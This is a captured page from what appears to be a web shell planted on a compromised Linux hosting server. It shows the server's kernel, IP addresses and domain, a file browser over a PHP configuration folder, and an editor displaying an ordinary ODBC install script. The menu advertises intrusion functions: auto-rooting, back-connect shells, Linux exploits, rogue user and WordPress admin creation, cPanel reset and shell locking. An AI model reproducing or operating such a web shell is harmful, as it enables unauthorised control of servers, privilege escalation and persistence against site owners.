Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.191.120.103
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-php-config /
[ HOME SHELL ]
Name
Size
Permission
Action
alt-php-panel-configuration.py
7.42
KB
-rwxr-xr-x
alt-php.cfg
211
B
-rwxr-xr-x
detectcp.py
690
B
-rwxr-xr-x
detectcp.pyc
740
B
-rw-r--r--
install_odbc
526
B
-rwxr-xr-x
multiphp_reconfigure.py
6.24
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : install_odbc
#!/bin/sh #dist_ver=$(cat /etc/redhat-release | sed -e 's#[^0-9]*##g' | cut -b1) # add repo conf #curl https://packages.microsoft.com/config/rhel/${dist_ver}/prod.repo > /etc/yum.repos.d/mssql-release.repo cat << EOF > /etc/yum.repos.d/mssql-release.repo [packages-microsoft-com-prod] name=packages-microsoft-com-prod baseurl=https://packages.microsoft.com/rhel/\$releasever/prod/ enabled=1 gpgcheck=1 gpgkey=https://packages.microsoft.com/keys/microsoft.asc EOF # install packages ACCEPT_EULA=Y yum -y install msodbcsql17
Close